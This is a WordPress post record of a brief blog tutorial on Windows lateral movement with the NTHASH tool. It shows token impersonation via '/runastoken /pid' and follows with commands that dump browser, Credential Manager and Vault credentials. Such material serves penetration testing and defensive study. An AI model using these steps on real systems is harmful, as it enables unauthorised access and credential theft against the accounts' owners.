{"id":2206,"date":"2019-10-29T21:59:29","date_gmt":"2019-10-29T20:59:29","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2206"},"modified":"2019-10-30T12:53:30","modified_gmt":"2019-10-30T11:53:30","slug":"demonstrating-lateral-movement-with-nthash-part-7","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2206","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #7"},"content":{"rendered":"<p>In previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2193\" rel=\"noopener\" target=\"_blank\">articles<\/a>, we have used Pass The Hass to perform lateral movement.<br \/>\nThis time, lets drop PTH and use token impersonation.<\/p>\n<p>Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal server).<br \/>\nThat other user may happen to be admin on systems where you currently dont have access to (yet).<br \/>\nImpersonating this user will let you perform lateral movement.<\/p>\n<p>This is as simple as running <strong>NTHASH-win64.exe \/runastoken \/pid:xxx<\/strong> where pid is owned by that other user.<\/p>\n<p>Just keep in mind that you need to be running an elevated shell to do so.<br \/>\nIf not done yet, simply run <strong>NTHASH-win64.exe \/runas<\/strong> before running the command above.<\/p>\n<p>As simple as that : again, no need to know the user password (nor the hash this time).<\/p>\n<p>Once running under the context of this other user you can then run commands like :<br \/>\nNTHASH-win64.exe \/chrome<br \/>\nNTHASH-win64.exe \/firefox<br \/>\nNTHASH-win64.exe \/enumcred<br \/>\nNTHASH-win64.exe \/enumcred2<br \/>\nNTHASH-win64.exe \/enumvault<br \/>\n&#8230;<\/p>\n<p>And keep moving lateral&#8230; or up&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In previous articles, we have used Pass The Hass to perform lateral movement. This time, lets drop PTH and use token impersonation. Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal <a href='https:\/\/labalec.fr\/erwan\/?p=2206' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2206","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2206"}],"version-history":[{"count":3,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206\/revisions"}],"predecessor-version":[{"id":2209,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206\/revisions\/2209"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2206"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2206"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2206"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}